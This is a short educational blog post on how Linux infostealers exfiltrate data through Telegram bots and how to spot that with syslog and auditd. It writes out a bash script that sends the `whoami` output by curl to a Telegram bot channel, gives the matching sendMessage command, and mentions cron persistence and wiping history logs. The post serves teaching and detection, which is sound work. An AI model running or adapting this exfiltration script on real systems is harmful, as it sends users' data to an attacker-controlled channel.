DEV Community

Paula
Paula

Posted on

Linux Exfiltration

One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more.

In the past months, one of the most popular exfiltration attempts was done through Telegram or Discord bots (as well as C2-Command and Control attempts).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:

https://api.telegram.org/bot<BotToken>/getUpdates
Enter fullscreen mode Exit fullscreen mode

As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'
Enter fullscreen mode Exit fullscreen mode

Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output for the sake of the example. Of course, this could include way more things such as architecture, disk info and more. Most of there sort of samples will attempt to also check crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bash

messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"

curl $mycommand

Enter fullscreen mode Exit fullscreen mode

The Office character shushing as saying a secret

When this is executed, the username is sent to the channel.

name popping up in the channel

Now, most of these will install the script in cron usign crontab and delete the history log.

In case the crontab log is still intact, we will be able to see the crontab edition using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option: auditd

Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!

Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!

Image description

Sometimes these attacks include messing up the /var/log so maybe having a backup in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real life samples, take a look at my older posts about setting a custom Linux Honeypot. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attack, and more).

Top comments (2)

Collapse
 
jj profile image
Juan Julián Merelo Guervós

The exfiltrator stores their API key in plain text? Or is that encrypted somehow?

Collapse
 
nigel447 profile image
nigel447

time well spent reading this ++